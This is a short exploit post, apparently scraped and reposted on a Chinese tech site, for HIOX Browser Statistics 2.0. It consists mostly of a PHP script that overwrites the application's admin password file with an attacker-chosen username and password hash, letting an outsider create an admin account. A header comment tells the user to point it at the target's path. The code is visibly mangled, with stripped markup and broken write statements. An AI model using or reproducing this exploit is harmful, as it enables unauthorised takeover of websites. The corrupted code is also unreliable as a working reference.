@session_start();
?>
?>
/* HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability [~] Discoverd & exploited by Stack [~]Greeatz All Freaind [~]Special thnx to Str0ke [~] Name Script : HIOX Browser Statistics 2.0 [~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip You need to change http://localhost/path/ with the link of script it's very importent */ $creat = "true"; $iswrite = $_POST['createe']; if($user=="" && $pass==""){ if($iswrite == "creatuser") { $usname = $_POST['usernam']; $passwrd = md5($_POST['pword']); if($usname != "" && $passwrd != ""){ $filee = "http://localhost/path/admin/passwo.php"; $file1 = file($filee); $file = fopen($filee,'w'); fwrite($file, " fwrite($file, "$"); fwrite($file, "user=\"$usname\";\n"); fwrite($file, "$"); fwrite($file, "pass=\"$passwrd\";"); fwrite($file, "\n?>"); fclose($file); $creat = "false"; echo " New User Created ";Please Wait You will be Redirected to Login Page } else{ echo " Enter correct Username or Password ";} } if($creat == "true"){ ?>
} }else{ echo " User Already Exist ";} ?> |
以上就是HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit的详细内容,更多请关注0133技术站其它相关文章!
